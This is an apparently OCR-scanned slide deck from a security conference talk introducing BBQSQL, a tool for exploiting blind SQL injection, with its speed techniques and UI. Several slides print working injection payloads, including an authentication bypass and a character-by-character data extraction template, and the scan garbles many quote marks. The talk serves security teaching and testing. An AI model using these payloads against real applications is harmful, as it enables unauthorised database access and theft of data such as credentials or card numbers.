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Who are we? 



• Ben Toews 

o Security Consultant / Researcher at 
Neohapsis 

• Scott Behrens 

o Security Consultant / Researcher at 
Neohapsis 
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Why are we here? 



• BBQSQL 



New dog, old trick 

■ Exploits Blind SQL Injection 
New dog, new trick 

■ Fast 

■ Easy 

■ Gets those hard to reach spots 
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SQL What? 



• Structured Query Language (SQL) 

o Language for interacting with database 

• SQL Injection 

o Inject syntax into an application's SQL 
queries 
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Basic SQL Injection 



Normal Case : 

UNAME = "mastahyeti" 
PASS = "s3cret" 

QUERY = "select * from users where pass=md5 
( f " + PASS + " f ) and uname= f "+ UNAME +" f " ; 
QUERY evaluates to: 

select * 
from users 

where pass=md5 ( 1 secret 1 ) 
and uname= 1 mastahyeti 1 
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Basic SQL Injection 



SQL Injection Case: 

UNAME = "pwned 1 or f l f = f l"; 
PASS = "pwned"; 

QUERY = "select * from users where pass=md5 
( f " + PASS + " f ) and uname= f "+UNAME + " f " ; 
QUERY evaluates to: 

select * 
from users 

where pass=md5 ( 1 pwned 1 ) 

and uname= 1 pwned f or f l f = f l f 
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Blind SQL Injection 



• Still trying to alter SQL syntax 

• Dumping database 

• More complex SQL syntax 
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Blind SQL Injection 



Blind SQL Injection Case: 

UNAME = " ! or (ASCI I ( SUBSTR ( SELECT user(), 

1,1))>63) 

PASS = ""; 

QUERY = "select * from users where pass=md5 
( 1 "+PASS+" f ) and uname= 1 "+ UNAME +" f " ; 
QUERY evaluates to: 

select * 

from users where pass=md5 ( 1 1 ) 

and uname= ff or (ASCII (SUBSTR (SELECT user(), 
1,1))>63) — 1 
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Blind SQL Injection 



select * 

from users where pass=md5 ( 1 1 ) and 
uname= 1 1 
or ( 

ASCII ( « char -> int 

SUBSTR( « slice string 

SELECT user () << current user 

,1,1) « first char 

) >63 « 63 = 1 ? 1 

) -- 1 << comment 
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Blind SQL Injection 



• Binary (or other) search for each 
character 

• One character at a time 

• Time consuming 
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Blind SQL Injection 



Lots of excellent tools out there 
o sqlmap, sqlninja, BSQL Hacker, 
the Mole, Havi j , ... 

Lots of great features 

A A A A A A -i ■ n 

good j ob guys . . . 

If these tools don 1 1 work 
o You end up writing a custom script, 
test, debug, test, debug. . . 

What if there was a way to simplify 
tricky Blind SQL Injection attacks... 
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Images from http://www.freedigitalpriotos.net/ 



BBQSQL 



• Exploits Blind SQL Injection 

• For those hard to reach spots 

• Semi-automatic 

• Database agnostic 

• Versatile 

• Fast 

• Fast 

• Did we mention it is fast? 
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BBQSQL : Use 



• Must provide the usual information 

o URL 

o HTTP Method 

o Headers 

o Cookies 

o Encoding methods 

o Redirect behavior 

o Files 

o HTTP Auth 

o Proxies 

o ... 
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BBQSQL : Use 



• Provide two additional pieces o 
info 

o Specify where the injection goes 

o Specify what syntax we are injecting 
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BBQSQL : Use 



• The injection can go ANYWHERE: 

O url => "http : //google . com?vuln= '${ query } " 

O data => "user=foo&pass=$ { query } " 

O cookies => {' PHPSESSID ':' 123123 ',' F00 ':' BAR$ { query }' } 

• doesn't understand data 
doesn't care about your annoying: 

■ serialization format 

■ processes and rules 

■ encodings 
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BBQSQL : Use 



• The query specifies how to do binary 
search : 

O query => "' and ASCI I ( SUBSTR (( SELECT data FROM data 
LIMIT 1 OFFSET $ { row_index : 1 } ) , $ { char_index : 1 } , 
1 ) ) $ { comparator : > } $ { char_val : } # " 

• Database agnostic 

• Doesn't care about your annoying: 
o SQL syntax 

o Charset limitations 
o IDS/IPS 
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Demo? 



Images from http://gossipsucker.com/ 



BBQSQL : Speed 



• Concurrent HTTP requests 

• Multiple search algorithms 

o Binary search 

o Frequency based search 
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BBQSQL : Speed 



• Concurrent HTTP requests 

• Multiple search algorithms 

o Binary search 

o Frequency based search 
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BBQSQL : grequests 



grequests = gevent + requests 
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BBQSQL : grequests 



grequests = gevent + requests 
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BBQSQL : gevent 



"gevent is a coroutine-based Python 
networking library that uses 
greenlet to provide a high-level 
synchronous API on top of the 
libevent event loop" 

-http : //gevent . org 
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BBQSQL : gevent 



• Coroutine ~ function 

• You spawn many simultaneous coroutines 

• Only one runs at a time 

• When a coroutine encounters blocking 
(network 10) it yields and allows the 
next coroutine to run while it waits 

• This forms an event-loop 

• Functionally, it appears to act like 
threading 
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BBQSQL : grequests 



grequests = gevent + requests 
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BBQSQL : requests 



"HTTP For Humans" 

-docs .python- requests . org 

• Awesome HTTP API built on top of urllib3 
in Python 

• Written/maintained by Kenneth Reitz 
o API designing badass 
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BBQSQL : grequests 



grequests = gevent + requests 
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BBQSQL : grequests 



Good Evented HTTP for Python 
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BBQSQL : Speed 



• Concurrent HTTP requests 

• Multiple search algorithms 
o Binary search 

o Frequency based search 
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BBQSQL : Binary Search 
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Case : 



O(log(n) ) 
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BBQSQL : Speed 



• Concurrent HTTP requests 

• Multiple search algorithms 

o Binary search 

o Frequency based search 
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BBQSQL : Linear Search 
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BBQSQL : Frequency 



• Analysed lots of books, source 
code, CCs, SSNs :P 

• Most common characters are [ 1 1 , 
f e', T t T , f o f , T a'] 

• Most likely characters to follow 
'e f are [' \ f r f , T n'] 
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BBQSQL : Frequency 



• Very fast against non-entropic data: 
o English 

■ -10 requests/character 
o Python 

■ -8 requests/character 
o Credit card numbers 

■ -5.5 requests/character 

• VS . binary search 
o English 

■ -12 requests/character 
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BBQSQL : UI 



UI is built using source from Social 

Engineering Toolkit (SET) 

o Thanks Dave (ReLlK) Kennedy! 

Input validation is performed on each 
configuration option in real time to 
prevent snafu 

O You don't have to wait till you type up a huge 

request on the CLI and find out your 600 char POST 
data is malformed! 
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BBQSQL : UI 



• Configuration files can be imported and 
exported through UI or CLI 

o Uses ConfigParser so easy to work with 

• Can export attack results as CSV file 
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Credits 



• Wikipedia (math is hard) 

• Neohapsis Labs 

• Image links are embedded in 
presentation 



ReLIK - SET 

engineer- tool kit/ 



https : //www. trustedsec . com/ downloads /social- 
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Thanks 



Ben Toews - @mastahyeti 

Scott Behrens - @helloarbit 

Neohapsis ( . com) « Hiring 

<< bonus4us 

BBQSQL 

github . com/neohapsis/bbqsql 
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